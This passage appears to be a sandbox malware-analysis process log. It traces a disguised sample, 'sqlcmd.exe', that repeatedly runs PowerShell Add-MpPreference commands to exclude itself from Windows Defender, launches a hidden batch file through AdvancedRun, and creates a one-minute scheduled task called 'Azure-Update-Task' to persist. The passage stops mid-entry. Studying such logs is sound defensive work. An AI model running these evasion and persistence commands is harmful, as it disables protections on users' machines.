c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1888

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1392

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1160

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1088

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1000
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Executes dropped EXE
  - Windows security modification
  - Suspicious use of SetThreadContext
  PID:4628
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6496
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7900
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4652
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    - Blocklisted process makes network request
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    PID:4452
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6676
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6996
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7032
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7472
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6204
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7348
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7332
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7520
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7616
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3984
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4580
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4776
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2996
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:1360
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5552
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7708
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4276
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:760
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8064
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4820
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7992
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:380
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1052
- - C:\Users\Admin\AppData\Local\Temp\fda17379-94bf-4900-8e66-badb6e5b664f\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\fda17379-94bf-4900-8e66-badb6e5b664f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\fda17379-94bf-4900-8e66-badb6e5b664f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    - Executes dropped EXE
    PID:1872
  - - C:\Users\Admin\AppData\Local\Temp\fda17379-94bf-4900-8e66-badb6e5b664f\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\fda17379-94bf-4900-8e66-badb6e5b664f\AdvancedRun.exe" /SpecialRun 4101d8 1872
      4⤵
      Executes dropped EXE
      PID:2876
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:8108
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    - Executes dropped EXE
    PID:7596
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:64
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4564
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5712
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6392
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2788
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2820
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7056
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1216
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3188
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4336
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7068
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8148
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7644
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7160
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8116
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5388
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:8072
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6644
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6344
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6380
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6700
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5372
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3852
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5908
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7548
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5876
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5200
- - C:\Users\Admin\AppData\Local\Temp\137fcb88-ee22-413a-8736-014f035daff5\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\137fcb88-ee22-413a-8736-014f035daff5\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\137fcb88-ee22-413a-8736-014f035daff5\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    - Executes dropped EXE
    PID:1080
  - - C:\Users\Admin\AppData\Local\Temp\137fcb88-ee22-413a-8736-014f035daff5\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\137fcb88-ee22-413a-8736-014f035daff5\AdvancedRun.exe" /SpecialRun 4101d8 1080
      4⤵
      PID:3276
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:652
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:380
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:6676
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:7992
- C:\Users\Admin\AppData\Roaming\jwtwjbt
  C:\Users\Admin\AppData\Roaming\jwtwjbt
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3464
- - C:\Users\Admin\AppData\Roaming\jwtwjbt
    C:\Users\Admin\AppData\Roaming\jwtwjbt
    3⤵
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:6524
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6496
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7880
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7972
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5600
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7760
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4040
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:212
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5832
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4680
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3324
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6136
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6636
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:2384
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6704
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5676
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5260
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4312
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6500
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6336
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5080
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
